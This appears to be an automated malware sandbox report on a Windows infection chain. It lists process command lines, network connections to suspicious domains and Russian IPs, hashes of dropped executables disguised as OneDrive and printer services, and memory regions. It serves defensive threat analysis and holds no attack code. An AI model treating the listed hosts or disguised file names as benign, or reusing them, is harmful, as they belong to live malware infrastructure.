"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5264 -childID 3 -isForBrowser -prefsHandle 5012 -prefMapHandle 5360 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5d4ea74e-7da4-4994-9ef7-ef8eb95057de} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5600 -childID 4 -isForBrowser -prefsHandle 5520 -prefMapHandle 5528 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a30cbc54-bc37-4aed-8b06-07888ef366fe} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5504 -childID 5 -isForBrowser -prefsHandle 5728 -prefMapHandle 5732 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fcfe0068-0237-4ee5-bd03-8a36deaf886f} 2580 "\\.\pipe\gecko-crash-server-pipe.2580" tab
C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe
"C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| SE | 77.239.121.5:1668 | tcp | |
| SE | 77.239.121.5:1668 | tcp | |
| SE | 77.239.121.5:1668 | tcp | |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| RU | 185.215.113.16:80 | tcp | |
| RU | 185.215.113.16:80 | tcp | |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 104.21.28.84:443 | circujitstorm.bet | tcp |
| US | 104.21.28.84:443 | circujitstorm.bet | tcp |
| US | 104.21.28.84:443 | circujitstorm.bet | tcp |
| US | 104.21.28.84:443 | circujitstorm.bet | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 104.21.28.84:443 | circujitstorm.bet | tcp |
| US | 8.8.8.8:53 | exarthynature.run | udp |
| US | 104.21.32.1:443 | exarthynature.run | tcp |
| US | 104.21.28.84:443 | circujitstorm.bet | tcp |
| US | 104.21.28.84:443 | circujitstorm.bet | tcp |
| US | 104.21.32.1:443 | exarthynature.run | tcp |
| US | 104.21.28.84:443 | circujitstorm.bet | tcp |
| US | 104.21.32.1:443 | exarthynature.run | tcp |
| US | 104.21.28.84:443 | circujitstorm.bet | tcp |
| US | 104.21.32.1:443 | exarthynature.run | tcp |
| US | 104.21.32.1:443 | exarthynature.run | tcp |
| US | 104.21.28.84:443 | circujitstorm.bet | tcp |
| US | 104.21.28.84:443 | circujitstorm.bet | tcp |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| US | 104.21.13.146:443 | dawtastream.bet | tcp |
| US | 104.21.32.1:443 | exarthynature.run | tcp |
| US | 104.21.13.146:443 | dawtastream.bet | tcp |
| US | 104.21.28.84:443 | circujitstorm.bet | tcp |
| US | 8.8.8.8:53 | decreaserid.world | udp |
| US | 8.8.8.8:53 | uncertainyelemz.bet | udp |
| US | 8.8.8.8:53 | hobbyedsmoker.live | udp |
| US | 8.8.8.8:53 | dsfljsdfjewf.info | udp |
| US | 8.8.8.8:53 | deaddereaste.today | udp |
| US | 8.8.8.8:53 | subawhipnator.life | udp |
| US | 8.8.8.8:53 | privileggoe.live | udp |
| US | 8.8.8.8:53 | pastedeputten.life | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | techpxioneers.run | udp |
| US | 172.67.150.34:443 | techpxioneers.run | tcp |
| US | 104.21.13.146:443 | dawtastream.bet | tcp |
| US | 104.21.13.146:443 | dawtastream.bet | tcp |
| US | 172.67.150.34:443 | techpxioneers.run | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 104.21.13.146:443 | dawtastream.bet | tcp |
| US | 104.21.13.146:443 | dawtastream.bet | tcp |
| US | 172.67.150.34:443 | techpxioneers.run | tcp |
| US | 104.21.28.84:443 | circujitstorm.bet | tcp |
| US | 104.21.28.84:443 | circujitstorm.bet | tcp |
| US | 104.21.28.84:443 | circujitstorm.bet | tcp |
| US | 172.67.150.34:443 | techpxioneers.run | tcp |
| US | 104.21.28.84:443 | circujitstorm.bet | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 104.21.28.84:443 | circujitstorm.bet | tcp |
| US | 172.67.150.34:443 | techpxioneers.run | tcp |
| RU | 45.93.20.28:80 | 45.93.20.28 | tcp |
| US | 104.21.28.84:443 | circujitstorm.bet | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 172.67.150.34:443 | techpxioneers.run | tcp |
| N/A | 127.0.0.1:55489 | tcp | |
| US | 8.8.8.8:53 | youtube.com | udp |
| GB | 142.250.187.238:443 | youtube.com | tcp |
| GB | 142.250.187.238:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| GB | 142.250.187.238:443 | youtube.com | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| GB | 142.250.180.14:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| GB | 142.250.180.14:443 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| GB | 216.58.213.14:443 | consent.youtube.com | tcp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| GB | 216.58.213.14:443 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | udp |
| N/A | 127.0.0.1:55497 | tcp | |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| NL | 2.18.121.73:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 172.217.169.78:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 172.217.169.78:443 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r2---sn-aigl6ns6.gvt1.com | udp |
| GB | 74.125.105.7:443 | r2---sn-aigl6ns6.gvt1.com | tcp |
| US | 8.8.8.8:53 | r2.sn-aigl6ns6.gvt1.com | udp |
| US | 8.8.8.8:53 | r2.sn-aigl6ns6.gvt1.com | udp |
| GB | 74.125.105.7:443 | r2.sn-aigl6ns6.gvt1.com | udp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 34.107.152.202:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.107.152.202:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.107.152.202:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.107.152.202:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.107.152.202:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.107.152.202:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | location.services.mozilla.com | udp |
| US | 35.190.72.216:443 | location.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.200.46:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.200.46:443 | play.google.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
| MD5 | a92d6465d69430b38cbc16bf1c6a7210 |
| SHA1 | 421fadebee484c9d19b9cb18faf3b0f5d9b7a554 |
| SHA256 | 3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77 |
| SHA512 | 0fc65c930a01db8cf306252402c47cf00b1222cd9d9736baf839488cdd6cf96ae8be479e08282ec7f34b665250580466a25cdfc699f4ecef6d5e4d543db8c345 |
C:\Users\Admin\AppData\Local\Temp\10062550101\UXwM0dy.exe
| MD5 | 7b45c3677c257113115f23dfcaa26814 |
| SHA1 | 336d8bbf5ed9e5ccfa84add87c63ec8ac64409a6 |
| SHA256 | 002a077540ad5c7b2b1d4f324abc7a47fd2eb4e5484401da948bb068c8dcb47f |
| SHA512 | 69e28d547fcdd5fe7718b2ec45fd5d0df4521afea6d5f483418a73fbf16804b4df81e4cc354bc8caec956656ee5af234300e1cbaa60d43a8f00752c1032531cd |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SettingsHandlers.OneDriveSaving.exe
| MD5 | d7ff6e16dfc21e0b3e596aba511b910f |
| SHA1 | c9dd4ae8db521cc755ac8f368db87c2dca5abccd |
| SHA256 | 23f00951ff701f27faa9b1ec58ce3f99454df1cbad1f176337fed33b7e4b8da1 |
| SHA512 | fbd9a46512d8fcb1037abc03520c6f968ca40ee9029795207c02bdf328559d93f23229d26affa6f8dc8e7bf09c24d250a1914dc1e0e78fe7b0f94cc1f43905d7 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\OneDriveSavingService.exe
| MD5 | e1a8a7c307300e5da588114053275120 |
| SHA1 | 8b84333c2d2f3d0572278d34ccf03782790dd641 |
| SHA256 | 916bf39546059ebb4f6d5f03bf93ac9684e85c91966696bfd6c9f21e39b3341f |
| SHA512 | 99a03a420be15db81da20109826532000988fa5450c956ecf9ae5be2914c1f1d9d487ef2f55655f0029b6316217cebfdd1bdeb7c7d253afe42284e7f5cc3ac77 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\vcruntime140.dll
| MD5 | 7af17bfd24be72d5376c9c5ce86bef54 |
| SHA1 | 23bf5fa4c467f28990cc878ef945f9f5db616b75 |
| SHA256 | bf28f4d89ea74cb5cecbf42b951bf0629d71efa6525cc58aee71aa5e06f1198a |
| SHA512 | 0783c5dae87f110cc9bb61355c92c4ef3a96f484bbce6354d7f4130bb92ffb655974fcac4fe11c8923dd81ddade7fa92c8e3d9c43d0a3d0a24dd3d30e626fb5e |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\libcrypto-3-x64.dll
| MD5 | 8d9dc42ffefe2b3443add056784c98fb |
| SHA1 | c2a97d2a372e4badacac196a1f6bcbecdcd35940 |
| SHA256 | d45ff6fdb2911d07efc3d47a2e0298534eab617d63e9eebd358d1686ed0992aa |
| SHA512 | e04e07e7c7a8f9b9b98ca0e94767a64808295290a936b50786e06f6a65207dd6ee4fd423bc3e1639186005767e0522c3dd7ba23ac0cbe50116249717fd6c3b83 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\msvcp140.dll
| MD5 | d424100821374848f3c22d0acd55ad69 |
| SHA1 | 8e4f879faece2d5171b3d398202c74b7286c50b1 |
| SHA256 | a6e45d08e347eddc955e5074354fc9e98a48ee75587b73a18d01943527cf05a8 |
| SHA512 | f78085cbba49c4c2c4441d1483e63e9222ec5b4282b89c1e0c1ea0790972e5de452f82e61ceae7324c7466d33b9a5fc6224594cf574068c69bf949e94fb86ae6 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\SavingsSync\vcruntime140_1.dll
| MD5 | e2520906be67a9bde01ebe9e0a53aab5 |
| SHA1 | 9a9e445a47508ba5e1126791a863107060d258a1 |
| SHA256 | fd8ee0936d0380962830e9c1a132b8b7bf25084cb342bb064f699a2daa343bc4 |
| SHA512 | 6616df46da37f656ac3e1fe7b371792b249e3ff97f2cbcefc19e7854e384aba88f63e7afc7c81ba14d3d15d309146986b23e25c071f4d0150429009de110e9c5 |
C:\Users\Admin\AppData\Roaming\winsvcs\WindowsPrinterService.exe
| MD5 | c538a47d1a799fa7d1788d983103e4bd |
| SHA1 | 050bb4d8fc9d0205e9c87a48e177d0415305225d |
| SHA256 | fcaa43fb66fde6705e446746b382b3531e42803745822873c6c4c94f83b64d59 |
| SHA512 | 43f42610a376a96a8e3a566b2cf062480757039eb31e28240456f474530ad1795472249f1ddb196860d01781df4af4824a3111c21033619ffc4d3e6f7f717725 |
C:\Users\Admin\AppData\Local\Temp\10062570101\12c2d2f481.exe
| MD5 | 0282be73e52cb40d1893413356ecc019 |
| SHA1 | 288fe6f9b2cf7be34a2a2be1cb9be01d56048c49 |
| SHA256 | 7696e4e6fb26e0a6c4e320326e784f0d560db8922109a72e04076af0d72b0664 |
| SHA512 | be2447a02ee1b237cbf83c8c1d2dc876e79dbdab8297bb5a1ea3d4ffd8c8b1b2564327f285cac30f1f3b42480400e4259a6e323f5b7f265f6c91008ae85e8e82 |
memory/1944-86-0x0000000000400000-0x000000000055C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe
| MD5 | c47d95cdfaa1a720ab35c329eaf7ddeb |
| SHA1 | 0bfa3caf0a382415566209682cc24bb705cc1f68 |
| SHA256 | b002b8be5d3a93f326869492c1458fa14bfb83bbc23b5cd3208e80e27c4f12a9 |
| SHA512 | bc6c779ba802a90733e3bf68910eeeb734d00bfe351b0e8c44b3fa2efa8b962b7dc5c8aca3c40ccfcec452e15451454f0f08460e01130c3f335cb71df8feb438 |
C:\Users\Admin\AppData\Local\Temp\Ro1bFndli.hta
| MD5 | 4e2782c3233ae400cf95b0e06375fe4c |
| SHA1 | 6a2441486c6b428c8a88269ad0090f320c1285b6 |
| SHA256 | 90a091e69e89f1c13a17007b81ee7e88c1cc0e9d419d0304ef49dc5edda04414 |
| SHA512 | e3b9df19deea5956a42dac124f83ff28e1d108dd99d4e2474e7e1c2f19bb6e101685ce87f69799680e03e9c7f2466bf59087d0e64dd4a5ea9f19d8fa8ee1efed |
memory/4936-106-0x0000000002680000-0x00000000026B6000-memory.dmp
memory/4936-107-0x0000000004F10000-0x0000000005538000-memory.dmp
memory/4936-108-0x0000000004C70000-0x0000000004C92000-memory.dmp
memory/4936-110-0x0000000005620000-0x0000000005686000-memory.dmp
memory/4936-109-0x0000000005540000-0x00000000055A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sd2vbmp4.2n0.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4936-120-0x0000000005790000-0x0000000005AE4000-memory.dmp
memory/4936-121-0x0000000005C30000-0x0000000005C4E000-memory.dmp
memory/4936-122-0x0000000005C80000-0x0000000005CCC000-memory.dmp
memory/4936-123-0x0000000007570000-0x0000000007BEA000-memory.dmp
memory/4936-124-0x0000000006160000-0x000000000617A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10062730121\am_no.cmd
| MD5 | 189e4eefd73896e80f64b8ef8f73fef0 |
| SHA1 | efab18a8e2a33593049775958b05b95b0bb7d8e4 |
| SHA256 | 598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396 |
| SHA512 | be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74 |
memory/1944-135-0x0000000000400000-0x000000000055C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 6195a91754effb4df74dbc72cdf4f7a6 |
| SHA1 | aba262f5726c6d77659fe0d3195e36a85046b427 |
| SHA256 | 3254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5 |
| SHA512 | ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c210c72ee1f238aa78e146e36f88754e |
| SHA1 | 29fb48cd4974781993b228d37b5675df61264d2d |
| SHA256 | 5c313965f94afaef85628cf9f4a6e1b3be21a3564e35c76a99b578d3656e6c2a |
| SHA512 | 2cca512f0e27779ca62c16f718e29f314fa0252893d094a63730dfbe1cc0aa8a0ceb856cefbc964f39255669722d4dae83ffa49143adcca60cd85f9488138ee3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4bc2be70ef7e0df4ca65910c621d605b |
| SHA1 | 8c419f3f26eb08b31f4a772104e87b5d46329af6 |
| SHA256 | b28d412c0aecb152168eb1efbd6232668122677234db6f0172416786a92d9830 |
| SHA512 | b9e30a162dab223cffef0aac5e471087d24e1a80f7a168514922ad372152ab929a184a0ddbcd87ca997f0b97d8398d41a0694d8ea42b2a82d081518c07165e1d |
C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
| MD5 | 98d249e93dc8a0a37b9225c1f9a42abd |
| SHA1 | 695d7b5ef9ff0c135d5bc2522c5805c00020c82b |
| SHA256 | 5bc0bf81cd564d205ca4243e2111eb1ab116ba68ae65deea98cf3a2a52deaa8f |
| SHA512 | a1d5c86a0fe43bf0f9d3490c406b04eeae2259bf6f8a76a85819ee7364da5f42d775a36d06a6c2c518e33e8dfa4e90f3cfeb912e1a1023c23445aedb10935804 |
C:\Temp\7Ate2U9Z1.hta
| MD5 | 16d76e35baeb05bc069a12dce9da83f9 |
| SHA1 | f419fd74265369666595c7ce7823ef75b40b2768 |
| SHA256 | 456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7 |
| SHA512 | 4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 870c9e4de7b4da63f455058dcc2a5765 |
| SHA1 | 1ab9681288bd8819d1cc4d29f7d4805e8a050037 |
| SHA256 | 8ecc7161e67dd41c514713cdf8d7b3c2be2329d3009596ac73a0b4ad59776a81 |
| SHA512 | ff4b475ea7f2bb75a65bfd6898add5858be3f22aabb9c492b0b3232bdf77a8b436930f2812542086af77afe07cad425550ab89aa86198ab7b1cf4d5a1f25223d |
C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe
| MD5 | 60dd2030e1ff1f9a3406ddc438893694 |
| SHA1 | b01f2c39b1046bc892c9db78898e1c063b21836f |
| SHA256 | d77580f219e5b86e38e34d2125862a58d03a76ac1b6dbb40bc4f65b114bbb4ee |
| SHA512 | 15f9aad02632481934b3f271debf73d5cf61bdd824d0f4a47e38b391186f7de16ba5f1d51f391625b945ff14b55d90cd31799b1483837aea732a45effef94246 |
memory/1996-227-0x0000000000E60000-0x0000000000EBC000-memory.dmp
memory/1996-228-0x0000000005BC0000-0x0000000006164000-memory.dmp
memory/2952-230-0x0000000000400000-0x000000000045E000-memory.dmp
memory/2952-232-0x0000000000400000-0x000000000045E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe
| MD5 | ebcd88613fed4a2608bc1768817bce4d |
| SHA1 | afbba964372b91250c4c04ec9ee649a36a50b95f |
| SHA256 | 124e9553ae88df251e56e6dade1476fec8ef86fd579d978ca3b0d66ca3506a3e |
| SHA512 | 45f0bdf0c0c5d63662723110985b5dd7c295f70f79d55080dada64fa8480f074f6c7276f2a8acf712fd5793eabe3be77e2c72470ad282707eface715f1cbd113 |
memory/992-280-0x00000000002B0000-0x0000000000767000-memory.dmp
C:\ProgramData\4C37BB32B51BA9A6.dat
| MD5 | a182561a527f929489bf4b8f74f65cd7 |
| SHA1 | 8cd6866594759711ea1836e86a5b7ca64ee8911f |
| SHA256 | 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914 |
| SHA512 | 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558 |
memory/4936-297-0x0000000007150000-0x00000000071E6000-memory.dmp
memory/4936-298-0x00000000070E0000-0x0000000007102000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 06ad34f9739c5159b4d92d702545bd49 |
| SHA1 | 9152a0d4f153f3f40f7e606be75f81b582ee0c17 |
| SHA256 | 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba |
| SHA512 | c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92 |
C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe
| MD5 | 6561c25c19e19f1cb72d61d4c83fff7d |
| SHA1 | 0afde35d7217f377642a4fde2b733c30edcbed82 |
| SHA256 | 0c33fade35e2a90baed41e12cec5783f525d8ccbc74dd1be54315cef697b2d18 |
| SHA512 | 4e1c347a17aedc07dd960a5ba3c926ff810b025257a6a3ea91c3a1da6571d533a080e58d1db9ccb36c3f4ce1297f534e769adceabe481616a04d7b90070ff33a |
memory/2212-322-0x0000000000050000-0x0000000000348000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fdbd897a9ff49dbeb32afba4435ec642 |
| SHA1 | 2ca5e682e477fdfb1eb68846ab20278c1f32b394 |
| SHA256 | e4db00181622dc712f23d019c2eb05a89acad0095a4d3ddd70039e7576f298d3 |
| SHA512 | 3e6004a2a38afebda88cedd6cca40b315b6ada0456e37dfafc723b35d1598b20649221f9359d09063813de107213dae7a5a953b7f8259735faeb2310e9c5687c |
memory/992-325-0x00000000002B0000-0x0000000000767000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe
| MD5 | 124bba2cbe0bd1a0e7403b6003006a9e |
| SHA1 | 5238bad10b7743a8496e2fb1bd63c93a8b97f266 |
| SHA256 | 1118ac24b10268323425567a456c821491449e4f51fc1f0315202a295875acb0 |
| SHA512 | 970f42d781e55818c8405bc6fd0b9cdf7a14d1f4c2247c93c0193f6c497f0bc58c2264ea678c9a2fa0b038cec69bab5aa7ffe913c6ff990c308921501672f71c |
memory/3656-340-0x00000000009E0000-0x0000000001612000-memory.dmp
memory/2212-341-0x0000000000050000-0x0000000000348000-memory.dmp
memory/2212-342-0x0000000000050000-0x0000000000348000-memory.dmp
memory/992-343-0x00000000002B0000-0x0000000000767000-memory.dmp
memory/3656-345-0x00000000009E0000-0x0000000001612000-memory.dmp
memory/3656-344-0x00000000009E0000-0x0000000001612000-memory.dmp
memory/324-358-0x0000000000510000-0x000000000053F000-memory.dmp
C:\ProgramData\209A0D9393C47190.dat
| MD5 | f310cf1ff562ae14449e0167a3e1fe46 |
| SHA1 | 85c58afa9049467031c6c2b17f5c12ca73bb2788 |
| SHA256 | e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855 |
| SHA512 | 1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad |
C:\ProgramData\1232DCF5D55FC594.dat
| MD5 | e5255232caf353cf5f46513af1352fdc |
| SHA1 | 36bb600caeae9b1aeb6cadb070b5b3ae0f08e29a |
| SHA256 | 54068471caeede3ebcc48f21cc5d9d8dddace93485d5daf10717415457ef098b |
| SHA512 | 9d62608bf3a713d2e6b08e05304d7b404f9bcc56e46f7438be7a14347d2d97dab2f13fe90527155625fcf754cfceec975538c10a9bb620f25b736057436f1b1b |
C:\ProgramData\87D457C229B30313.dat
| MD5 | 4dd07a122751ef8ccbfe3e08472eadb1 |
| SHA1 | f464e924e948caf5ec5017b2cc0418f603a9c79a |
| SHA256 | 8d44ab9149fb07384bdd677b529227726b608c726c57f1710f5c7f08f645bb54 |
| SHA512 | f7a067cb8f844c8b0924006500e18a13026f120c2a7c9e5ff21fc7c1af80d6a3b9f537e3cb9d7c7975a3bd96ee4ab29c2df2198e6abd7b4328fb75af07c58e9c |
C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe
| MD5 | 3f8a7305cc0f9b7211be0928311de539 |
| SHA1 | f23b0e82ba9b347bb3f93dc0106c76189ab4c26c |
| SHA256 | ad6fd9f1a4b495cc3ec679f0b57a136f81e12e68db5b25baec990ceb107e1b79 |
| SHA512 | afc6ff1e9bcd403d678197bb8ff21907d02d7c95ed796356b24dcd590a6d978a10eb1db9d3e82ed3d07e8d5ea0b29372c64bd029a62ed14526038e5e1193e485 |
C:\ProgramData\B1437FE0192C89C7.dat
| MD5 | 9618e15b04a4ddb39ed6c496575f6f95 |
| SHA1 | 1c28f8750e5555776b3c80b187c5d15a443a7412 |
| SHA256 | a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab |
| SHA512 | f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26 |
C:\ProgramData\077FF07F93D3B441.dat
| MD5 | 349e6eb110e34a08924d92f6b334801d |
| SHA1 | bdfb289daff51890cc71697b6322aa4b35ec9169 |
| SHA256 | c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a |
| SHA512 | 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574 |
memory/324-392-0x0000000000510000-0x000000000053F000-memory.dmp
memory/324-387-0x0000000000510000-0x000000000053F000-memory.dmp
memory/3656-397-0x00000000009E0000-0x0000000001612000-memory.dmp
memory/1988-401-0x0000000000AB0000-0x00000000014AC000-memory.dmp
memory/2212-402-0x0000000000050000-0x0000000000348000-memory.dmp
memory/324-406-0x0000000010000000-0x000000001001C000-memory.dmp
memory/992-410-0x00000000002B0000-0x0000000000767000-memory.dmp
